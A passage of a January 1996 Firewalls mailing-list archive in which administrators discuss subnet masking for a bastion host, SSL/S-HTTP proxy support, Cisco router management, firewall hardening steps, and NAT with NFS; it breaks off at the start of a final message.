xnet1 (xnet1.microsoft.com [157.54.17.204]) by imail2.microsoft.com (8.7.1/8.7.1) with SMTP id RAA10982 for ; Fri, 5 Jan 1996 17:28:32 -0800 (PST) X-Received: from xmtp3 by xnet1 with receive; Fri, 5 Jan 1996 17:25:34 -0800 X-Received: from RED-70-MSG by xmtp3 with recvsmtp; Fri, 5 Jan 1996 17:25:27 -0800 Received: by red-70-msg.itg.microsoft.com with Microsoft Exchange (IMC 4.18.611) id <01BADB92.CCC3C480@red-70-msg.itg.microsoft.com>; Fri, 5 Jan 1996 17:25:25 -0800 Message-ID: From: "Kurt Buff (Volt Comp)" To: "firewalls@greatcircle.com" Subject: RE: Bastion netmask query Date: Thu, 4 Jan 1996 22:00:01 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.18.611 X-MsXMTID: xmtp3960106012527RECVSMTP[01.52.00]00000104-23306 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It seems to me that someone with half a brain (not me, I only have 1/4) could write a simple program (PERL, VB, ??) that would take some input (number of nodes, number of segments, network address(es), etc.) and output some reasonable netmasking and segmenting suggestions, including forbidden/unwise host addresses (due to broadcast address conflicts, etc.). Does anyone know of such a beastie? Or would this really be such a hard thing to write? Kurt ---------- From: bobk@manzanita.DEV.3Com.COM[SMTP:bobk@manzanita.DEV.3Com.COM] Sent: Thursday, January 04, 1996 7:34 To: firewalls@greatcircle.com; jonw@mntcmp2.demon.co.uk Subject: Re: Bastion netmask query You wrote: > > We have a class C of our own A.B.C.0 and are currently configuring the > network as follows: > > Addresses A.B.C.1 to 15 > > ISP +-----------+ +-----------+ > Lease | Cisco |----------------------| ftp/web | plus others > ---- | 2514 | | machine | as needed > Line | |----------| | | > +-----------+ | +-----------+ > | subnet is A.B.C.16 to 31 > | > | eth0 A.B.C.31 > +-----------+ > | Bastion | Dual Homed > | Machine | > | | > +-----------+ > | eth1 A.B.C.32 > | > | subnet is A.B.C.32 to 254 > -------------------|------------------------ Secure Internal > > Can anyone confirm what the netmasks and broadcast addresses should be for the > two bastion ethernet devices. First of all, these nets are using three different subnet classification schemes. This can cause problems unless carefully managed. The subnet mask 255.255.255.240 will divide your class C address space into 16 subnets of 15 hosts each A.B.C.0, A.B.C.16, A.B.C.32, A.B.C.48, A.B.C.64, A.B.C.80, A.B.C.96, A.B.C.112, A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176, A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240. The subnet mask 255.255.255.224 will effectively divide your class C address space into 8 subnets of 31 hosts each: A.B.C.0, A.B.C.32, A.B.C.64, A.B.C.96, A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224. The subnet mask 255.255.255.192 will divide your class C into 4 subnets of 63 hosts each. A.B.C.0, A.B.C.64, A.B.C.128, A.B.C.192. It is possible to use different masks on each side of the router and bastions machine, but unless you are carefull (or using OSPF) (I don't know how IGRP works), you are asking for trouble by splitting up subnets unevenly. In addition, you will find that any subnet that is part of a smaller division scheme, but not actually used must be thrown away if this is done with RIP (RIP V.2 can help some). On the other hand, you may be able to divide up the Class C, and then assign multiple subnets to your larger net, as long as you remember to use the smaller subnet masking scheme, and let the router handle communications between subnets. I could write a lot more on the subject, but not being sure of your objectives, I'd rather not second guess you here. Good luck, BobK From firewalls-owner Fri Jan 5 20:29:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13307 for firewalls-outgoing; Fri, 5 Jan 1996 20:21:46 -0800 (PST) Received: from starbase.ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13302 for ; Fri, 5 Jan 1996 20:21:42 -0800 (PST) Received: from cbk.tiac.net by starbase.ingress.com (SMI-8.6/SMI-SVR4 ) id XAA03816; Fri, 5 Jan 1996 23:21:13 -0500 Date: Fri, 5 Jan 1996 23:21:13 -0500 Message-Id: <199601060421.XAA03816@starbase.ingress.com> X-Sender: cbk@ingress.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: cbk@ingress.com (Charles B. Kaplan) Subject: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefor any proxy supporting HTTP should work with S-HTTP. Next, while SSL COULD be implimented accross multiple protocols, etc, the 'only' wide spread use presentally is via netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI out of the box proxys port 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things. NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That ofcourse is why BorderWare provides a 3'rd network interface for 'secured servers'. Well, enough plugging of BorderWare....if you didn't guess I resell it. Anyone care to either veryify or correct the above S-HTTP notes ? -Charles Kaplan for more information on BorderWare call 800-254-7159 From firewalls-owner Fri Jan 5 20:44:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13331 for firewalls-outgoing; Fri, 5 Jan 1996 20:24:24 -0800 (PST) Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13326 for ; Fri, 5 Jan 1996 20:24:21 -0800 (PST) Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id UAA17610; Fri, 5 Jan 1996 20:22:58 -0800 Date: Fri, 5 Jan 1996 20:22:58 -0800 Message-Id: <199601060422.UAA17610@odin.community.net> Subject: Re: Security managing Cisco Routers From: Bill Husler To: "Paul Ferguson" cc: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>At 02:15 PM 12/27/95 GMT, Pietro wrote: >>> >>>>My actual problem is to managed several Cisco Routers situated >>>>on a public network from a central site, from where there is no >>>>way to garantee secure communication. >>>> > >>I have heard that Firewall-1 will manage the configurations of CISCO >>routers remotely. I believe the way it works is that you set up the >>configuration or a Firewall-1 Administrative Workstations and it send >>some sort of encrypted/secured transmission to the router to downlowd the >>new config. >>Bill >> > >Although I'm not intimately familiar with the internal mechanisms of >Firewall-1, I do have a problem with the above paragraph, since we >do not (yet) support encrypted transport mechanisms. :-) > >- paul > >-- >Paul Ferguson || || >Consulting Engineering || || >Reston, Virginia USA |||| |||| >tel: +1.703.716.9538 ..:||||||:..:||||||:.. >e-mail: pferguso@cisco.com c i s c o S y s t e m s > > Paul, Your absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters. I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response. Bill From firewalls-owner Fri Jan 5 20:59:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA13612 for firewalls-outgoing; Fri, 5 Jan 1996 20:47:40 -0800 (PST) Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA13607 for ; Fri, 5 Jan 1996 20:47:36 -0800 (PST) Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id UAA19237 for ; Fri, 5 Jan 1996 20:46:16 -0800 Date: Fri, 5 Jan 1996 20:46:16 -0800 Message-Id: <199601060446.UAA19237@odin.community.net> Subject: Re: SSL and S-HTTP Proxy support From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Brian W. McKenney, mckenney@smiley.mitre.org > >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. > >This is the information that I have: > >1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >2. KarlBridge/KarlBrouter: S-HTTP proxy >3. Milkyway Blackhole: S--HTTP >4. SOS Brimstone: S-HTTP proxy >5. Technologic Interceptor: S-HTTP proxy >6. V-One SmartWall: S-HTTP proxy > >License versions of TIS Gauntlet will support whatever the next Gauntlet >release supports. > You can add ANS Interlock to you list. Bill From firewalls-owner Fri Jan 5 23:14:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA15912 for firewalls-outgoing; Fri, 5 Jan 1996 23:01:20 -0800 (PST) Received: from NS1.stl.net (stl.net [199.217.196.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA15907 for ; Fri, 5 Jan 1996 23:01:16 -0800 (PST) Received: from sam.stl.net (sam.stl.net [199.217.196.3]) by NS1.stl.net (8.6.11/8.6.9) with SMTP id BAA16391 for ; Sat, 6 Jan 1996 01:49:18 -0600 Date: Sat, 6 Jan 1996 01:49:18 -0600 Message-Id: <199601060749.BAA16391@NS1.stl.net> X-Sender: bart@pu.com (Unverified) X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: bart@pu.com (Bart Rivard) Subject: Steps in building a firewall, Right or Wrong? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here is the steps I have taken tell me what you think. 1) Installed FreeBSD on a Pentium 100 with 32 MB of Ram and two Ethernet NICs 2) Configured the Kernel such that IP forwarding and Source routing are disabled. 3) Deleted all accounts on the system except root 4) Gave root a password with number, letters, uppercase and lowercase, 10 long 5) Deleted everything out of inetd.conf except DNS 6) Configured DNS so that the only machine it knows about is a Web server which is in the DMZ and the firewall machine and wildcard MX record. 7) Configured resolv.conf on firewall to point to the internal network DNS. 8) Turned off source routing on the CISCO 2500 router and added filters which disabled all UDP traffic except port DNS/53, all TCP inbound traffic except SMTP to firewall, News from specific news server to firewall http to web server in DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on router, what do you think? 9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to web proxy by network interface but don't know how? 10)Modified a mail program so that it read mail from port 25 and writes to disk mail messages. Completely dumb program. Does not handle distribution list, aliases or anything. I then pick mail up off of disk and send it to internal CC mail gateway. Was there shareware to do equivalent? Can sendmail pick mail up off of disk? Is it safe to have sendmail pick mail up off of disk and distribute? 11)Put TCP Wrapper around news server port to only except connection from our news provider at AT&T and internal network. Also use inn access control to limit access from internal network for reading news and news provider for dumping news. Well that about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server so we don't allow news to pass through firewall but the firewall doubles as a news server. Is it safe to use a firewall as a news server? Please comment!! Send all comments to bart@pu.com. TIA, Bart From firewalls-owner Sat Jan 6 05:14:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20595 for firewalls-outgoing; Sat, 6 Jan 1996 05:10:13 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20590 for ; Sat, 6 Jan 1996 05:10:10 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo6.cisco.com [171.68.13.16]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id FAA17555; Sat, 6 Jan 1996 05:08:46 -0800 Message-Id: <199601061308.FAA17555@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 06 Jan 1996 08:09:15 -0500 To: "Kurt Buff (Volt Comp)" From: Paul Ferguson Subject: RE: Bastion netmask query Cc: "firewalls@greatcircle.com" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure, you could hack something together to do this, but why not simply use RFC-1878 instead? - paul At 10:00 PM 1/4/96 -0800, Kurt Buff (Volt Comp) wrote: >It seems to me that someone with half a brain (not me, I only have 1/4) >could write a simple program (PERL, VB, ??) that would take some input >(number of nodes, number of segments, network address(es), etc.) and output >some reasonable netmasking and segmenting suggestions, including >forbidden/unwise host addresses (due to broadcast address conflicts, etc.). >Does anyone know of such a beastie? Or would this really be such a hard >thing to write? > >Kurt > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Jan 6 15:05:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA27839 for firewalls-outgoing; Sat, 6 Jan 1996 14:36:54 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA19713 for ; Sat, 6 Jan 1996 03:49:33 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA26435; Sat, 6 Jan 96 06:48:38 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA06276; Sat, 6 Jan 96 11:49:06 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9601061149.AA06276@london.csd.harris.com> Subject: Re: NAT & NFS ? To: avalon@coombs.anu.edu.au (Darren Reed) Date: Sat, 6 Jan 96 11:49:05 GMT Cc: firewalls@greatcircle.com In-Reply-To: <9601060009.AA05624@hawk.hcsc.com>; from "Darren Reed" at Jan 6, 96 11:10 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren, Some NAT definitions I am using to answer your NFS question. NAT: The change of an IP address within a packet to hide or withold IP addresses that are not 'public'. This is implied when proxies are in use, but also is done in the IP layer. external: One of potentially many interfaces which NATs packets as they pass over the interface. internal: One of potentially many interfaces which does not NAT packets. session: Transmission and receipt of packets which includes TCP/UDP transmits and ICMP error receipts. Any packet 'session' can be initiated from internal to external as internal host has full visibility of external address space. The external host will only see packets coming from the firewall. Returned packets will get forwarded (with IP address translated) back to the originator. Any packet 'session' initiated from external will never get to internal as there is absolutely no visibility of internal address space. The above is true for all TCP, UDP, RPC, and ICMP packets. (For those that do not know, RPC is a protocol using TCP or UDP packets as a carrier. NFS then uses RPC for communication protocol.) Now to NFS ..... If an external host has a NFS exported file system, any internal host can mount that file system (as permitted by the normal NFS export rules). If NAT takes place at the IP layer, no extra work or enabling is required at the filrewall. The things to be aware of 1. The external host will see the NFS read/write etc activity coming from the firewall IP address, not the internal host IP address. The exports file needs to reflect this. 2. The external host will see the mount request coming from the firewall IP address, and embedded within the mount request RPC packet is the name of the host doing the mount request. The external host will lookup this embedded host name, and if the IP address is not the same as the firewall address, the mount request is refused. You will need to 'fake' the internal hosts IP address on the external host if the firewall cannot translate the embedded host name. Regards Jon BTW Are there many firewalls out there that can filter on RPC as NFS through a firewall is scary. Harris CyberGuard can. > In some mail from Jon Shallow, sie said: > > > > This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get > > suitably rewritten - even the ICMP error codes. > > > > The 'inside' system can initiate talk to the 'external' system, but the > > 'external' system has no knowledge of the 'internal' IP address - just > > the firewall. > > This doesn't quite answer what I was wondering... > > I'm particularly interested in what this means for NFS...does it mean > your internal systems need to be setup to allow the firewall to NFS to > them so that external systems can be provided with NFS ? > > > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > > > and server, actively rewriting the addresses in all the packets involved ? > > > If so, have any problems or unexpected situations arisen ? > > darren > From firewalls-owner Sat Jan 6 17:44:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA00945 for firewalls-outgoing; Sat, 6 Jan 1996 17:42:21 -0800 (PST) Received: from gxl.woodtech.com (gxl.woodtech.com [204.248.87.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA00938 for ; Sat, 6 Jan 1996 17:42:17 -0800 (PST) Received: (from joey@localhost) by gxl.woodtech.com (8.6.12/8.6.12) id TAA02804; Sat, 6 Jan 1996 19:50:40 -0600 Date: Sat, 6 Jan 1996 19:50:40 -0600 (CST) From: "Joe Smith (Really!)" To: Bart Rivard cc: firewalls@GreatCircle.COM Subject: Re: Steps in building a firewall, Right or Wrong? In-Reply-To: <199601060749.BAA16391@NS1.stl.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 6 Jan 1996, Bart Rivard wrote: > 3) Deleted all accounts on the system except root Unless you are limiting access to the system from the console, I would create one account (secured as you did root) to login to the system, and then su to root to do admin work. From firewalls-owner Sat Jan 6 18:59:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA01740 for firewalls-outgoing; Sat, 6 Jan 1996 18:47:46 -0800 (PST) Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA01735 for ; Sat, 6 Jan 1996 18:47:42 -0800 (PST) Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA03601 for Firewalls@GreatCircle.COM; Sat, 6 Jan 96 21:46:49 -0500 Apparently-To: Message-Id: Date: 6 Jan 1996 21:57:29 U From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V5 #7 Sent: Fri, Jan 5, 1996 9:36 PM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sat, Jan 6, 1996 9:57 PM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Sun Jan 7 01:44:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA08605 for firewalls-outgoing; Sun, 7 Jan 1996 01:42:31 -0800 (PST) Received: from uu10.psi.com (uu10.psi.com [38.8.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA08600 for ; Sun, 7 Jan 1996 01:42:28 -0800 (PST) Received: from po.gis.prc.com by uu10.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA25370 for Firewalls@GreatCircle.COM; Sun, 7 Jan 96 04:41:35 -0500 Apparently-To: Message-Id: Date: 7 Jan 1996 04:51:49 U From: "Server #7000007" Subject: Undeliverable Mail X-Mailer: Mail*Link SMTP-MS 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V5 #8 Sent: Sat, Jan 6, 1996 4:30 AM To: Harris Tom On Server: PRC Bellevue NE MS Date: Sun, Jan 7, 1996 4:51 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Sun Jan 7 05:44:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10968 for firewalls-outgoing; Sun, 7 Jan 1996 05:16:49 -0800 (PST) Received: from vogon.muc.de (vogon.muc.de [193.174.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10963 for ; Sun, 7 Jan 1996 05:16:38 -0800 (PST) Received: from cottage ([194.94.228.134]) by vogon.muc.de with SMTP id <93554-2>; Sun, 7 Jan 1996 14:15:08 +0100 Comments: Authenticated sender is From: "Andreas Grau" To: firewalls@greatcircle.com Date: Sun, 7 Jan 1996 15:12:30 +0100 Subject: Off-Topic: Selling Firewalls Reply-to: grau@muc.de X-mailer: Pegasus Mail for Windows (v2.23) Message-Id: <96Jan7.141508met.93554-2@vogon.muc.de> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please don't flame me for this (possibly) off-topic question, but I think, the best answer for my question is with the members of this great list. I started working for a VAR of firewalls and other network related products. When it comes to writing proposals, I feel there must be tools to effectively support the selling process - how to draw network designs - how to calculate network topology, eg. IP-numbers and netmasks - how to calculate the costs for the equipment (firewalls, routers ...) - how to ... How do you network consultants and reseller work out there, how do you make your life easier when it comes to desktop work. I feel there are better tools than M$-Word or Powerpoint to generate good proposals and solutions. TIA, Andreas -- Andreas Grau grau@muc.de From firewalls-owner Sun Jan 7 19:44:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA22712 for firewalls-outgoing; Sun, 7 Jan 1996 19:39:15 -0800 (PST) Received: from osa.osa.com.au (osa.osa.com.au [203.6.130.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA22707 for ; Sun, 7 Jan 1996 19:39:08 -0800 (PST) Received: from redgum.osa.com.au (redgum.osa.com.au [15.16.33.1]) by osa.osa.com.au (8.6.12/8.6.9) with ESMTP id OAA29613 for ; Mon, 8 Jan 1996 14:38:07 +1100 Received: from zeus.osa.com.au (zeus.osa.com.au [15.16.33.60]) by redgum.osa.com.au (8.6.9/8.6.9) with SMTP id OAA16315 for ; Mon, 8 Jan 1996 14:36:30 +1100 Received: by zeus.osa.com.au (AIX 4.1/UCB 5.64/4.03) id AA16914; Mon, 8 Jan 1996 14:38:05 +1100 From: tma@osa.com.au (Tim Adam) Message-Id: <9601080338.AA16914@zeus.osa.com.au> Subject: Re: SSL and S-HTTP Proxy support To: firewalls@GreatCircle.COM Date: Mon, 8 Jan 1996 14:38:04 +1100 (EST) In-Reply-To: <199601051841.NAA00513@hatteras.ch.inri.com> from "Bill Bunting" at Jan 5, 96 01:41:08 pm Organization: Open Software Associates X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bill Bunting writes: > SSL is not the type of protocol that requries a proxy. SSL is a Secure > Sockets Layer API that can be used with any TCP port. For example, you can > use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol. Did TIS > really tell you that they have a SSL proxy?? If so, what does it do? See ftp://ds.internic.net/internet-drafts/draft-luotonen-ssl-tunneling-02.txt Tim. -- Tim Adam tma@osa.com.au http://www.osa.com.au/ Open Software Associates Melbourne, Australia From firewalls-owner Sun Jan 7 20:29:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23468 for firewalls-outgoing; Sun, 7 Jan 1996 20:18:06 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA23463 for ; Sun, 7 Jan 1996 20:18:02 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id XAA25510 for firewalls@greatcircle.com; Sun, 7 Jan 1996 23:17:38 -0500 From: "Marcus J. Ranum" Message-Id: <199601080417.XAA25510@switchblade.v-one.com> Subject: new home for FAQ, and job openings To: firewalls@greatcircle.com Date: Sun, 7 Jan 1996 23:17:37 -0500 (EST) Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Internet Firewalls FAQ's home has moved once again. I'll be maintaining it now from: http://www.v-one.com/pubs/fw-faq/faq.htm Please update your pointers and web pages if you have hyperlinks. Also: if you're looking for, or know people who are good who are looking for work with a hot networking company, please see: http://www.v-one.com/misc/news.htm Thanks! mjr. From firewalls-owner Mon Jan 8 00:44:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA26869 for firewalls-outgoing; Mon, 8 Jan 1996 00:24:26 -0800 (PST) Received: from mailhost.ixos.de (HOST.50.22.ixos.de [149.235.50.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA26855 for ; Mon, 8 Jan 1996 00:24:19 -0800 (PST) From: snoopy@munich.ixos.de Received: from polo.ixos.de ixos.de by mailhost.ixos.de with SMTP (5.65+/ixos-1.0.7) via Internet for greatcircle.com id AA02357; Mon, 8 Jan 96 09:23:15 +0100 Message-Id: <9601080823.AA02376@polo.ixos.de> Received: from localhost ixos by polo.ixos.de (4.1/iXOS/lan-1.0.6) via EUnet for mailhost id AA02376; Mon, 8 Jan 96 09:23:13 +0100 X-Mailer: exmh version 1.6.4 10/10/95 To: gamble@dxcoms.cern.ch Cc: firewalls@GreatCircle.com, pdetemme@cisco.com Subject: Re: Looking for a speaker In-Reply-To: Your message of "Thu, 04 Jan 1996 09:24:28 +0100." <9601040824.AA23767@dxcoms.cern.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Mon, 08 Jan 1996 09:23:12 +0100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi there, I would perhaps do it: I have a brother in Vevey - might be a nice chance to go an visit him. If you pay the travel, I would like to do it. I am the Sysadmin here and I do give tutorials and talks on such subjects... Love, Snoopy -- snoopy@munich.ixos.de "The USA have Bill Clinton, Stevie Wonder,Bob Hope, Johnny Cash. We have Helmut Kohl - no wonder, no hope, no cash..." From firewalls-owner Mon Jan 8 02:16:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA00718 for firewalls-outgoing; Mon, 8 Jan 1996 02:12:04 -0800 (PST) Received: from hugin.mainz.dk (Hugin.mainz.dk [130.227.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA00713 for ; Mon, 8 Jan 1996 02:11:59 -0800 (PST) Date: Mon, 08 Jan 1996 11:11:01 +0100 (MET) Date-warning: Date header was inserted by MAINZ.DK From: Kim Wohlert Subject: RE: Bastion netmask query To: Firewalls@GreatCircle.COM Message-id: <01HZRKLT6HNM0003MC@MAINZ.DK> MIME-version: 1.0 X-Mailer: Windows Eudora Light Version 1.5.2 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "Kurt Buff (Volt Comp)" >Date: Thu, 4 Jan 1996 22:00:01 -0800 >Subject: RE: Bastion netmask query > >It seems to me that someone with half a brain (not me, I only have 1/4) >could write a simple program (PERL, VB, ??) that would take some input >(number of nodes, number of segments, network address(es), etc.) and output >some reasonable netmasking and segmenting suggestions, including >forbidden/unwise host addresses (due to broadcast address conflicts, etc.). >Does anyone know of such a beastie? Or would this really be such a hard >thing to write? > No, and someone did. It is called RFC 1878: http://www.internic.net/rfc/rfc1878.txt T. Pummill, B. Manning, "Variable Length Subnet Table For IPv4", 12/26/1995. (Pages=8) -Kim =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Kim Wohlert |Internet:Kim.Wohlert@mainz.dk erik mainz a/s |X.400: c=DK a=DK400 p=Minerva Dortheavej 7 |o=mainz s=Wohlert g=Kim DK-2400 Copenhagen |Phone: +45 38 34 77 88 Denmark |Fax: +45 31 19 16 25 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Books: Virtual Reality unplugged From firewalls-owner Mon Jan 8 04:14:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA02387 for firewalls-outgoing; Mon, 8 Jan 1996 03:52:40 -0800 (PST) Received: from synet.edu.cn (saint.synet.edu.cn [202.112.29.85]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA02382 for ; Mon, 8 Jan 1996 03:52:26 -0800 (PST) Received: from neu.edu.cn (bengal.neu.edu.cn) by synet.edu.cn (5.x/SMI-SVR4) id AA11994; Mon, 8 Jan 1996 19:53:05 +0800 Received: by neu.edu.cn (4.1/SMI-4.1) id AA05119; Mon, 8 Jan 96 19:53:25 CsT From: guxj@neu.edu.cn (Gu Xinji) Message-Id: <9601081153.AA05119@neu.edu.cn> Subject: Proxy ? To: firewalls@GreatCircle.com Date: Mon, 8 Jan 1996 19:53:25 +0800 (CsT) Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are going to provide Internet service,and need some kind of packet filtering or proxy services so that the govenment won't kick us out. my questions are(I only want firewall function for WWW) : 1). What kind of machine(Sun's) do I need to install proxy server on, so that it can support 20,000 users ? or is this possible(one machine) ? 2). If I use a SS20 with 128M memory as proxy server, how many users can it support? 3). Would it be better for me to use a Cisco7500(or what better?) to filter out certain http addresses than use proxy service? again, can Cisco support so many users? 4). What kind of proxy product would you recommend for efficiency , and easy operation(especially on client end)? Thanks in advance. Xinji Gu guxj@neu.edu.cn From firewalls-owner Mon Jan 8 05:33:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA04423 for firewalls-outgoing; Mon, 8 Jan 1996 05:26:07 -0800 (PST) Received: from mail.nyc.pipeline.com (mail.nyc.pipeline.com [198.80.32.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA04411 for ; Mon, 8 Jan 1996 05:26:02 -0800 (PST) Received: from pipe4.nyc.pipeline.com (jya@pipe4.nyc.pipeline.com [198.80.32.44]) by mail.nyc.pipeline.com (8.7.3/8.7.3) with ESMTP id IAA20730; Mon, 8 Jan 1996 08:25:06 -0500 (EST) From: John Young 